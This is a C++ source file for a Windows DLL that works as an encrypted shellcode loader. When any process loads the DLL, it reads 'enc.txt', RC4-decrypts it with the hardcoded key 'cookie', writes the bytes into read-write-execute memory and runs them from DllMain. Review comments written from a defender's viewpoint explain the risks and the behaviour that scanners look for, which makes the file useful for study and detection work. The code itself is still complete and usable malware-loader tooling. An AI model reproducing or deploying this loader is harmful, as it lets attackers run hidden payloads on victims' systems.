#include <iostream>
#include <fstream>
#include <vector>
#include <windows.h>
#include <cstring>
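/// @brief Applies the RC4 keystream to `data` in place.
///
/// RC4 is symmetric, so the same call both encrypts and decrypts. It provides
/// no integrity protection: a modified input decrypts without any error.
///
/// @param data Buffer transformed in place; an empty buffer is left as is.
/// @param key  Key bytes. An empty key leaves `data` untouched, because the
///             key schedule would otherwise take a modulo by zero.
void RC4Decrypt(std::vector<char>& data, const std::string& key) {
    if (key.empty()) {
        return;
    }
    const size_t keylen = key.size();

    // Key scheduling: start from the identity permutation and mix in the key.
    unsigned char s[256];
    for (int i = 0; i < 256; ++i) {
        s[i] = static_cast<unsigned char>(i);
    }
    int j = 0;
    for (int i = 0; i < 256; ++i) {
        // Read the key byte as unsigned: plain char may be signed, and a
        // negative byte could push j below zero and index outside s.
        j = (j + s[i] + static_cast<unsigned char>(key[i % keylen])) % 256;
        std::swap(s[i], s[j]);
    }

    // Keystream generation: one permutation step per byte, XORed into data.
    int i = 0;
    j = 0;
    for (char& byte : data) {
        i = (i + 1) % 256;
        j = (j + s[i]) % 256;
        std::swap(s[i], s[j]);
        byte ^= s[(s[i] + s[j]) % 256];
    }
}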
/// @brief Reads the whole of `filename` into memory as raw bytes.
///
/// The file is opened in binary mode and read to end-of-stream with no size
/// limit. An open failure is reported on std::cerr and yields an empty vector,
/// which is also what an empty file yields, so callers cannot tell them apart.
///
/// @param filename Path handed to std::ifstream unchanged.
/// @return The file's bytes, or an empty vector if it could not be opened.
std::vector<char> LoadShellcodeFromFile(const char* filename) {
    std::ifstream input(filename, std::ios::binary);
    if (input.fail()) {
        std::cerr << "Failed to open file: " << filename << std::endl;
        return {};
    }

    using ByteIter = std::istreambuf_iterator<char>;
    std::vector<char> bytes;
    bytes.assign(ByteIter(input), ByteIter());
    return bytes;
}
// Reads `filename`, RC4-decrypts its contents with the key embedded below,
// copies the result into newly allocated read/write/execute memory and calls
// it as a function taking no arguments.
//
// Security review notes:
//  - The decrypted bytes are executed as-is. Nothing here checks their origin
//    or integrity, so whoever can write `filename` decides what runs inside
//    the process that hosts this code.
//  - The key is a string literal in the binary. The RC4 layer therefore only
//    hides the file's content at rest; it authenticates nothing.
//  - A private PAGE_EXECUTE_READWRITE allocation that is written and then
//    called into is a pattern memory scanners and endpoint telemetry commonly
//    look for.
void LoadShellcode(const char* filename) {
    // Load encrypted shellcode from file
    std::vector<char> buffer = LoadShellcodeFromFile(filename);
    if (buffer.empty()) {
        // Silent return: the open failure (if any) was already reported by
        // LoadShellcodeFromFile; an empty file also ends up here.
        // std::cerr << "Failed to load from file." << std::endl;
        return;
    }
    // Decrypt the shellcode
    std::string key = "cookie"; // Match this key with the encryption key
    RC4Decrypt(buffer, key);
    // Debug: Display decrypted shellcode
    // std::cout << "Decrypted (first 10 bytes): ";
    // NOTE(review): the operand is an unsigned char, so the stream writes it
    // as a character and std::hex has no effect on it: up to ten raw payload
    // bytes go to stdout. std::hex also stays set on std::cout afterwards.
    for (size_t i = 0; i < std::min<size_t>(10, buffer.size()); ++i)
        std::cout << std::hex << (unsigned char)buffer[i] << " ";
    std::cout << std::endl;
    // Allocate executable memory
    // The region is requested writable and executable at the same time and
    // its protection is never changed afterwards.
    void* exec = VirtualAlloc(nullptr, buffer.size(), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (exec == nullptr) {
        std::cerr << "Failed to allocate executable memory. Error: " << GetLastError() << std::endl;
        return;
    }
    std::cout << "Executable memory allocated at: " << exec << std::endl;
    // Copy code to allocated memory
    std::memcpy(exec, buffer.data(), buffer.size());
    // Execute the code
    // NOTE(review): catch (...) handles C++ exceptions; under the default
    // exception model a hardware fault raised by the called bytes is not
    // handled here and would take down the host process.
    try {
        void (*func)() = (void(*)())exec;
        std::cout << "Executing shellcode..." << std::endl;
        func();
    }
    catch (...) {
        std::cerr << "Shellcode execution caused an exception!" << std::endl;
    }
    // Free allocated memory
    // Only reached if the call above returns or throws a C++ exception.
    VirtualFree(exec, 0, MEM_RELEASE);
    std::cout << "Executable memory released." << std::endl;
}
/// @brief Runs LoadShellcode on the fixed file name "enc.txt".
///
/// The name is relative, so it resolves against the current working directory
/// of whichever process has loaded this DLL, not against the DLL's location.
///
/// @return Always 0; failures inside LoadShellcode are not reported to the caller.
int running() {
    LoadShellcode("enc.txt");
    return 0;
}
// DLL entry point.
//
// On DLL_PROCESS_ATTACH it turns off per-thread notifications and then calls
// running(), so the whole read/decrypt/execute path runs as a side effect of
// the DLL being loaded, inside DllMain itself. For a defender this means that
// any process loading this DLL runs the payload with no export being called.
// NOTE(review): Microsoft's guidance is to keep DllMain minimal because it
// executes while the loader lock is held.
//
// Every other notification is ignored. Thread attach/detach notifications are
// not expected after DisableThreadLibraryCalls. TRUE is returned whether or
// not running() accomplished anything.
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
    if (fdwReason == DLL_PROCESS_ATTACH) {
        DisableThreadLibraryCalls(hinstDLL);
        running();
    }
    // DLL_PROCESS_DETACH, DLL_THREAD_ATTACH and DLL_THREAD_DETACH need no work.
    return TRUE;
}